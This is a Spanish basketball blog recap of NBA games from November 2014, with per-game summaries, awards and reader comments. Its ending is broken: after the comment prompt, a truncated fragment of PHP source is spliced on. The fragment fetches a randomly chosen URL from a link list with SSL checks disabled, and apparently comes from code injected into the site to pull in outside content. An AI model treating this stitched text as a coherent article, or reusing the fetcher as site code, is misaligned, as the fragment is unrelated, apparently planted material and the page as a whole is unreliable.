La Crónica: ¿Nos vemos en junio?

20 de November de 2014 por FranGuaita

LeBron es incapaz de rescatar a Cleveland, que cae en el Quicken Loans Arena ante el vigente campeón. Además, thriller apasionante en el Barclays Center: tres prórrogas en el Nets-Bucks para conmemorar el regreso de Jason Kidd. Indiana se impone a Charlotte con palmeo at the buzzer de Solomon Hill y, ojo, segunda victoria consecutiva de Lakers.

Pasen y lean.

CAVALIERS 90 – SPURS 92

A LeBron no le quedó otra que levantar la mano y pedir perdón al público que abandonaba cabizbajo las gradas del Quicken Loans Arena. A falta de cuatro segundos para la conclusión del partido, y después de un tiro libre fallado por Ginobili, James trataba de cruzar medio campo. El elegido fue incapaz de controlar la posesión y acabó botándosela el pie. Por allí andaba Manu Ginobili, uno de los más listos de la clase, para robar el balón y salir pitando hacia una de las esquinas mientras el tiempo se consumía. Por décima ocasión consecutiva, San Antonio se imponía a los Cavaliers. A LeBron le puede quedar un consuelo: el desenlace final fue una moneda al aire. Alternancia en el electrónico y excesiva precipitación de ambos equipos en lo segundos definitivos. Pudo ganar cualquiera. En una noche discreta de Tony Parker (8 puntos, 2-7 en tiros de campo), Tim Duncan y Boris Diaw anotaron 19 puntos cada uno para los actuales campeones, que se ponen con una marca de 7-4. Cleveland firma un discreto 5-5 en sus primeros diez encuentros. Eso sí, es sólo el principio. Veremos qué ocurre si ambas franquicias vuelven a encontrarse a principios de junio. No lo descarten.

ROCKETS 92 – LAKERS 98

Aparecen los primeros brotes verdes en la defensa de los Lakers de Byron Scott. Aprovechando la ausencia de Dwight Howard, y contra todo pronóstico, L.A. consigue dos triunfos en el primer back to back a domicilio de la regular season. Atlanta y Houston, dos pistas francamente complicadas, con las que la franquicia californiana adquiere algo de crédito tras el decepcionante inicio de temporada(1-9). Kobe Bryant firmó una hoja de servicios con 29 puntos, 5 rebotes y 7 asistencias, pero el protagonista de la jugada clave fue un actor secundario: Wesley Johnson. Desde la defensa, además. A falta de 45 segundos, con 92-91 para Rockets, el alero de Lakers robó el balón a James Harden -que trataba de especular con el reloj- y salió disparado al contragolpe. En pleno vuelo hacia la canasta, sufrió el contacto del hombre de la barba pero acertó a meter la bandeja. And one. 92-94. Young y Kobe certificaron la W desde la línea de tiros libres. La mini gira de Lakers concluye el viernes en Dallas. ¿Habrá 3 de 3?

NETS 118 – BUCKS 122 (3OT)

El regreso de Jason Kidd al Barclays Center fue digno de película hollywoodiense. Tres prórrogas, momentos increíbles -no se pierdan el error de Brandon Knight en la última jugada de la primera prórroga o su triplazo para forzar el tercer tiempo extra- y una buena dosis de morbo. Milwaukee, que en la madrugada del martes al miércoles sufrió hasta los últimos segundos para imponerse a New York, encadena su tercer triunfo consecutivo y asiste al despertar del gran candidato al premio rookie del año. Jugando, eso sí, 42 minutos, Jabari Parker anotó 23 puntos con una serie de 8-13 en tiros de campo.

RAPTORS 96 – GRIZZLIES 92

El que hasta anoche era en solitario el mejor equipo de la liga sufrió en el Air Canada Centre su segunda derrota de la regular season. Al margen del excelente trabajo de los Raptors, la franquicia con el mejor registro en el Este, conviene no perder de vista el overbooking en la enfermería de Memphis: Courtney Lee, Tony Allen, Beno Udrih, Kosta Koufos y Jon Leuer. Un desafío excesivo para hacer frente a Toronto, que tuvo en DeMar DeRozan a su jugador más destacado con 21 puntos, 5 rebotes y 4 asistencias. Marc Gasol y Zach Randolph estuvieron a gran nivel: 22 puntos, 12 rebotes y 4 asistencias, el español por 18 puntos y 18 rebobotes para Randolph.

PACERS 88 – HORNETS 86

Delirio absoluto en Indianápolis. Los incondicionales del Bankers Life Fieldhouse ya merecían un subidón como el de la pasada madrugada. Indiana Pacers -que sigue batallando en el Este pese a las ausencias de jugadores básicos como David West, Paul George, George Hill o CJ Watson- remontó 18 puntos de desventaja para imponerse a Charlotte con un palmeo de Solomon Hill sobre la bocina tras un tiro fallado por Rodney Stuckey. Buenos números de los interiores referencia en ambos equipos. Roy Hibbert (18 puntos, 11 rebotes) y Al Jefferson (28 puntos, 8 rebotes) acapararon buena parte del protagonismo en ataque.

WIZARDS 102 – MAVERICKS 105

Pese a abandonar la pista a falta de ocho minutos con una lesión aparentemente importante, Dirk Nowitzki fue el héroe de los Mavs en la tierra del Capitolio. El 4×4 alemán anotó un triple a falta de 1:20 para poner a Dallas cinco arriba (97-102). Un tiro demoledor que dejó sin capacidad de reacción a Washington. Se produce de esta forma la primera derrota de los Wizards en el Verizon Center. Recital anotador de Monta Ellis, con 34 puntos, 24 de ellos en los dos primeros cuartos.

NUGGETS 107 – THUNDER 100

No es sorprendente que, pese a la victoria de Denver, Brian Shaw se encaminara hacia los vestuarios del Pepsi Center con rostro tenso. Los Nuggets ganan por primera vez en la temporada dos partidos consecutivos, pero no acaban de carburar. Ni siquiera ante esa versión light de OKC sin Durant ni Westbrook. Ty Lawson lideró a la franquicia de Colorado con un doble doble incontestable: 15 puntos y 15 asistencias.

TIMBERWOLVES 115 – KNICKS 99

Mientras Derek Fisher no ajuste el sistema defensivo de NY, ganar partidos va a convertirse en una hazaña para la franquicia de la Gran Manzana. Minnessota, que hasta anoche únicamente había conseguido dos victorias y sigue arrastrando las bajas de Ricky Rubio, Nikola Pekovic y Thaddeus Young, no tuvo rival en el Target Center. Kevin Martin fue el ejecutor igualando su mejor registro personal de triples. Una serie de 7-11 para marcharse a 37 puntos ante la mirada atónita de Melo & company. Décima derrota de los Knicks en trece partidos.

SIXERS 90 – CELTICS 101

Philadelphia sigue siendo la única franquicia NBA que no ha conseguido ni una sola victoria tras las primeras cuatro semanas de competición. Once derrotas consecutivas. Sobrecogedor. Boston aprovechó el filón en el que se ha convertido el Wells Fargo Center esta regular season. La sociedad Jared Sullinger (22 puntos, 9 rebotes) – Brandon Bass (23 puntos, 6 rebotes) funcionó a pleno rendimiento. Tony Wroten firmó la jugada de la noche enchufando un triple desde casi medio campo para cerrar el tercer periodo.

PISTONS 86 – SUNS 88

Tres puntos finales de Eric Bledsoe -una rápida penetración y un tiro libre a falta de 1.3 segundos- permitieron a Phoenix consumar el asalto al Palace de Auburn Hills. Lo tuvo en sus manos Detroit, que se colocó uno arriba (86-85) gracias a un triple de Kentavious Caldwell-Pope en la recta final pero el perímetro de los Pistons fue incapaz de sujetar al eléctrico combo formado en la Universidad de Kentucky. A nivel numérico, Greg Monroe fue el MVP del partido con 18 puntos y 12 rebotes.

MAGIC 90 – CLIPPERS 114

Paseo plácido de los irregulares Clippers en el Amway Center. CP3 y Blake Griffin abrieron fuego combinándose para 36 puntos, pero el factor determinante para el triunfo de L.A. fue el funcionamiento de la segunda unidad. Jamal Crawford (22 puntos en 23 minutos), Jordan Farmar (13 puntos con 3-3 en triples) y Spencer Hawes (10 puntos, 6 rebotes) aportaron la energía necesaria para que los Clippers se impusieran en todos los cuartos y sumen así su sexta victoria.

PREMIOS

MVP: Brutal exhibición anotadora de Kevin Martin que encontró todas las facilidades posibles ante la débil defensa de los Knicks. Conectó 7 triples de 11 intentos y acabó con 37 puntos.

Rookie: Aunque fuera en 42 minutos los 23 puntos (con 8 de 13 en TC), 7 rebotes y 2 robos son buenas cifras para Jabari Parker. El único rookie que le puede hacer sombra hoy es el griego Kostas Papanikolau que acabó con 19 puntos y 6 rebotes. ¿Alguien esperaba este nivel del ex del Barça?

Sorpresa: Buen partido de Jordan Farmar del que pocos recordarían que juega en Los Angeles pero no donde solía. Salió desde el fondo del banco de los Clippers para anotar 13 puntos y repartir 5 asistencias.

Decepción: No está resultando un buen año para JJ Redick ni Jameer Nelson y ayer no fue una excepción. El de los Clippers sólo anotó 3 puntos mientras que el de los Mavs se quedó en 5 pero con un 2 de 12 en tiros de campo.

Esfuerzo en vano: Los Hornets comenzaban a echar de menos a Al Jefferson. Ayer cuajó un gran partido (28 puntos y 8 rebotes) pero los suyos no fueron capaces de llevarse la victoria de Indianapolis.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

5 comentarios a esta entrada

  1. Josgel dice:
    #1

    No lo hizo nada mal Bogdanovic tampoco. Buen papel de los dos rookies europeos, ahora solo falta que se suelte Mirotic.

      Citar

  2. Lucho dice:
    #2

    Gran analisis

      Citar

  3. Azabel dice:
    #3

    pude ver los tres tiempos extra de los Bucks y Nets

    para comentar, lo de Giannis, madre mia, de los mejores defensores que me ha tocado ver, y ofensivamente, resta pulir mucho, pero ya es bueno, ojo con este chaval que si la salud lo acompaña tiene pinta de futuro MVP

    lo de Parker es muy bueno, no anota los 20 puntos que creiamos, de hecho ayer es la primera vez en la temporada que llega a la veintena, pero no es por que no puede anotarlos, sino por que tira poco y juega poco, de hecho solo jugo un tiempo y medio de los tres extras, si jugara en los 76ers estaria en los 20 por partido caminando

    enorme futuro estos dos

    ahora lo de KIDD es fantástico,
    los Bucks son estos dos chavales, mas un grupo de juigadores jovenes que buscan re lanzar sus carreras como Baylees, Knight, Sanders, Pachulia, Ilyasova o principalmente Mayo y les esta sacando el jugo al maximo
    si a ellos les sumamos a Midletton (excelente en el tercer suplementario), Henson, Giannis y Parker, estmaos en presencia de un equipo de PO hoy, y sin dudas en una potencia a futuro al menos del este

      Citar

  4. David dice:
    #4

    Estooo…. El tiro libre fallado al final del Cavs-Spurs no fue de Timmy, fue de Manu….

      Citar

  5. MagicJohnson32 dice:
    #5

    David:
    Estooo…. El tiro libre fallado al final del Cavs-Spurs no fue de Timmy, fue de Manu….

    Cierto. Gracias y corregido.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>